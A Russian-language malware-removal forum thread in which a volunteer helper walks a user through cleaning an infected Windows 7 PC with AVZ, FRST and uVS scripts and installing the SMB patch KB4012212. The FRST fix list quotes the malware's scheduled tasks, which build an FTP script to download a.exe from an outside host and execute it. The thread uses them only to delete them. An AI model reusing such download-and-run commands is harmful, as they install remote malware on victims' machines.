Здравствуйте!
Прошу помощи в борьбе со зловредом.
Спасибо!
Здравствуйте!
Прошу помощи в борьбе со зловредом.
Спасибо!
Уважаемый(ая) [B]Allexan[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Обновления на систему не поставите - борьба будет вечной.
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
TerminateProcessByName('c:\windows\mssecsvc.exe');
QuarantineFile('c:\windows\mssecsvc.exe', '');
DeleteFile('c:\windows\mssecsvc.exe', '');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Перетащите лог Check_Browsers_LNK.log из папки Autologger на [url=http://dragokas.com/tools/ClearLNK.zip]утилиту ClearLNK[/url]. Отчёт о работе прикрепите.
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].
Приложите этот файл к своему следующему сообщению.
[QUOTE=Vvvyg;1495943]Обновления на систему не поставите - борьба будет вечной. [/QUOTE]
Спасибо. Будут установлены после лечения.
[QUOTE=Vvvyg;1495943]
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме. [/QUOTE]
Не удается.
Ошибка:
[QUOTE]Результат загрузки
Ошибка загрузки. Данный файл уже был загружен.[/QUOTE]
Прикреплен во вложениях ( quarantine.zip )
Спасибо.
Если карантин не грузится по назначению, т. е. по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме - не надо его крепить к сообщению, он просто пуст.
Остальное?
[QUOTE=Vvvyg;1495959] Остальное?[/QUOTE]
В предыдущем сообщении не загрузились, хотя в личном кабинете отображались во вложениях.
Теперь загружены.
Обновление, минимум одно, [URL="http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212"]вот это[/URL] придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
Closeprocesses:
(TODO: <公司名>) C:\Windows\Temp\conhost.exe
(www.google.com) C:\Windows\debug\lsmos.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{84e50cd2-df36-46d5-910c-7b471f362c92} <==== ATTENTION (Restriction - IP)
CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aminlpmkfcdibgpgfajlgnamicjckkjf] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fdjdjkkjoiomafnihnobkinnfjnnlhdg] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gnoechjgbgjkimgdjcjcffhcgndpiabg] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [imkcicmjkjckajdecoehjnncefopolkl] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [jdkihdhlegcdggknokfekoemkjjnjhgi] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lbnlgonhigdaalgmmibbeakhfkpmigil] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pchfckkccldkbclgdepkaonamkignanh] - hxxp://clients2.google.com/service/update2/crx
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
Virustotal: C:\Windows\SysWOW64\Drivers\64.exe
Virustotal: C:\Windows\system32\v1.exe
Virustotal: C:\Windows\system32\upsupx.exe
Virustotal: C:\Windows\system32\u.exe
Virustotal: C:\Windows\qeriuwjhrf
2019-01-29 09:08 - 2019-01-29 23:20 - 000000080 _____ C:\Windows\system32\s
2019-01-29 09:08 - 2019-01-29 23:20 - 000000078 _____ C:\Windows\system32\ps
2019-01-29 09:08 - 2019-01-29 23:20 - 000000076 _____ C:\Windows\system32\p
2019-01-29 06:53 - 2019-01-29 23:23 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\SysWOW64\Drivers\64.exe
2019-01-29 06:53 - 2019-01-29 23:23 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-01-29 06:53 - 2019-01-29 23:23 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-01-29 06:53 - 2019-01-29 23:23 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-01-29 06:53 - 2019-01-29 23:23 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-01-29 06:53 - 2019-01-29 23:23 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-01-29 06:52 - 2019-01-29 06:52 - 000697744 _____ C:\Windows\system32\v1.exe
2019-01-29 06:52 - 2019-01-29 06:52 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-01-29 06:52 - 2019-01-29 06:52 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-01-29 06:25 - 2019-01-29 06:38 - 003514368 ____S C:\Windows\qeriuwjhrf
2019-01-27 11:46 - 2019-01-29 23:23 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
C:\Windows\SysWOW64\scrobj.dll
C:\Windows\Temp\conhost.exe
C:\Windows\debug\lsmos.exe
C:\Windows\Temp\*.*
Task: {1602195B-679D-455B-9E4E-65ED15348FA9} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {A0074E6C-3D0E-40BE-AE14-043904F26267} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {EDE596D2-0EE1-4D67-AD43-FD4F919F5319} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {F20B2120-DB9D-49E5-A9FC-66FB9D024F78} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {FECC9A9C-4EBC-4877-81AB-5A44C831BBE9} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\": <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3: <==== ATTENTION
FirewallRules: [TCP Query User{6CCCB871-DEE2-439B-A558-0513E22005FA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
FirewallRules: [UDP Query User{D563E172-907C-48CC-8016-49C5E7E41FD6}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
FirewallRules: [{4BC6548D-C043-443B-8E72-696D37332F52}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
FirewallRules: [{BF8A0F99-CF2E-492C-8B94-3F6481899012}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
FirewallRules: [{196A500D-398D-45BA-9D53-2697D9484813}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
FirewallRules: [{1DEEF9B8-FF26-406C-BC7F-F3DAD3C34773}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
FirewallRules: [{CA380F18-17C6-461E-9586-3B76D1333C3B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
FirewallRules: [{FA2F0CF4-EADB-449E-83B9-7A87DEF378BD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
FirewallRules: [TCP Query User{88AA0036-191A-4623-AA85-31A24D000C05}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
FirewallRules: [UDP Query User{6C3086B8-D205-434C-A3A5-D7C6135461CB}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
FirewallRules: [TCP Query User{33292F7E-B2C6-4024-A757-F49460D59750}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
FirewallRules: [UDP Query User{31534FE0-2BD0-448E-99C7-D72D4A5DCDAF}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
FirewallRules: [{A0245617-E091-4F44-A064-48FA5CE0B820}] => (Block) LPort=445
FirewallRules: [{321FF512-75EA-437F-AB10-E3AD4DBFFDB4}] => (Block) LPort=139
Reboot:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Скачайте и запустите TDSSKiller: [url]http://support.kaspersky.ru/viruses/disinfection/5350[/url].
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)
Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.
После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.
[QUOTE=Vvvyg;1495967]Обновление, минимум одно, [URL="http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212"]вот это[/URL] придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.[/QUOTE]
Обновление KB4012212 не устанавливается с ошибкой:
[QUOTE]Обновление не применимо к этому компьютеру[/QUOTE]
Сервис пак установлен ( W7 Ultimate SP1 x64 )
Центр обновления перестал работать и выдает ошибку 8070422.
Починить пока не удается. Есть в сети подобные случаи выхода из строя центра обновления после инфицирования, решений нет.
[QUOTE=Vvvyg;1495967]
Файл C:\TDSSKiller.***_log.txt приложите в теме.[/QUOTE]
Во вложении.
[QUOTE=Vvvyg;1495967]Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.[/QUOTE]
Не нашел.
[QUOTE=Vvvyg;1495967]После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.[/QUOTE]
Во вложении.
СПАСИБО!!!!!
Для контроля сделайте такой ещё лог.
Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
Если файл не влезет во вложения, загрузите в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку.
Видимо, кривой дистрибутив 7-ки используете.
Скачайте [URL="http://www.tweaking.com/files/setups/tweaking.com_windows_repair_aio.zip"]Windows Repair (All In One)[/URL], распакуйте, запустите, "Jump To Repairs", "Open Repairs", отметьте пункты:
[b]14[/b] "Remove Temp Files"
[b]16[/b] "Repair Windows Updates"
[b]25[/b] "Restore Important Windows Services"
[b]26[/b] "Set Windows Services To Default Startup"
и нажмите "[B]Start Repairs[/B]".
После перезагрузки проверяйте работу обновления системы.
[QUOTE=Vvvyg;1496012]Для контроля сделайте такой ещё лог.
Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url]. [/QUOTE]
Во вложении.
[QUOTE=Vvvyg;1496012]Скачайте [URL="http://www.tweaking.com/files/setups/tweaking.com_windows_repair_aio.zip"]Windows Repair (All In One)[/URL], распакуйте, запустите[/QUOTE]
Обновление работает. KB4012212 установлено.
На всякий случай, свежие логи Farbar Recovery Scan Tool во вложении.
Спасибо.
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[code];uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
regt 25
delref %Sys32%\DRIVERS\STAROPEN.SYS
delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.X64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.X64.DLL
delref %SystemRoot%\SYSWOW64\MACROMED\FLASH\FLASH32_32_0_0_114.OCX
delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\BROWSER.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\BROWSERMANAGER\BROWSERMANAGERSHOW.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\53.0.2785.116\INSTALLER\CHRMSTP.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\TEMP\HYD6E5C.TMP.1438248788\HTA\3RDPARTY\OCCOMSDK.DLL
delref {11111111-1111-1111-1111-110011501160}\[CLSID]
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\UPDATER\YUPDATE-EXECUTOR.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
winsockreset
deldir C:\Windows\jNWhZ
del C:\Users\Boris\Desktop\Интернет.lnk
apply
deltmp
restart[/code]
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
[QUOTE=Vvvyg;1496072] UVS будет лог выполнения скрипта[/QUOTE]
Во вложении.
Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
[QUOTE=Vvvyg;1496143]Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.
[/QUOTE]
Спасибо!